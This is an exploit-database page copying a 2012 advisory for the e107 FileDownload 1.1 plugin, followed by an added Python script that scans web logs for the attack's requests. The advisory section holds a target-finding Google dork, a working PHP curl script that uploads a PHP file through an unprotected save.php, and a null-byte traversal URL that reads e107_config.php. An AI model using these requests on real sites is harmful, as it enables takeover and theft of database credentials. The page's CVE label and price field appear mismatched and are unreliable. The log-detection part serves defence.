e107 FileDownload 1.1 Shell Upload / File Disclosure

CVE: CVE-2018-8036
Category: CWE-20
Price: $500
Severity: Critical
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2012-06-20
CVSS: Not provided on the website. For detailed CVSS information, please check the official sources.
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012060241

Below is a copy:

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : e107 Plugins - FileDownload Plugin Multiple Vulnerabilities
# Version : 1.1
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=20&id=14
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.14
# Date : 18-06-2012
# Google Dork : inurl:/e107_plugins/filedownload
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :
 
1) Upload Shell

PostShell.php
<?php

$ch = curl_init("http://www.exemple.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('filename'=>'lo.php',
'accesses'=>'<?php phpinfo(); ?>'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

Shell Access : http://www.exemple.com/e107/e107_plugins/filedownload/filedownload/file_info/descriptions/lo.php.0

lo.php.0
<?php 
phpinfo(); 
?>


2) Remote File Disclosure

http://www.exemple.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00

[CTRL-u] for results

# Site : 1337day.com Inj3ct0r Exploit Database
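
A log check for the three request patterns shown in the advisory above, added here as a defender's example (it is not part of the original advisory or of the plugin's code). It assumes combined-format web server access logs; the finding names, the script-extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Plugin path taken from the advisory's URLs.
BASE = "/e107_plugins/filedownload/filedownload/file_info/"
REQ = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) [^"]*" (\d{3})')
# Assumed list of extensions a PHP-enabled server may execute.
SCRIPT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jun/2012:10:00:01 +0000] "POST /e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php HTTP/1.1" 200 12
192.0.2.10 - - [20/Jun/2012:10:00:05 +0000] "GET /e107/e107_plugins/filedownload/filedownload/file_info/descriptions/lo.php.0 HTTP/1.1" 200 48213
192.0.2.11 - - [20/Jun/2012:10:02:11 +0000] "GET /e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00 HTTP/1.1" 200 913
192.0.2.12 - - [20/Jun/2012:10:03:00 +0000] "GET /e107/news.php HTTP/1.1" 200 5120
192.0.2.13 - - [20/Jun/2012:10:04:00 +0000] "GET /e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=manual.pdf HTTP/1.1" 200 700
"""

def classify(line):
    """Return (client, finding, status) for a suspicious request, else None."""
    m = REQ.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)
    if BASE not in path:
        return None
    tail = path.split(BASE, 1)[1]
    # 1) Any POST to save.php: the body is not logged, so every hit needs review.
    if tail == "admin/save.php" and method == "POST":
        return (client, "write-endpoint", status)
    # 2) A script-like name requested from the descriptions directory.
    if tail.startswith("descriptions/") and SCRIPT.search(tail):
        return (client, "script-in-descriptions", status)
    # 3) edit.php with a 'file' value containing traversal or a NUL byte.
    if tail == "admin/edit.php":
        values = parse_qs(url.query).get("file", [])
        if any(".." in v or "\x00" in v for v in values):
            return (client, "traversal-read", status)
    return None

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, finding, status in scan(SAMPLE_LOG):
        print(f"{client}\t{finding}\tHTTP {status}")
```

A 200 status on the second or third finding type means the server answered the request, so the host should be checked for unexpected files under `file_info/descriptions/` and for exposure of `e107_config.php`.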

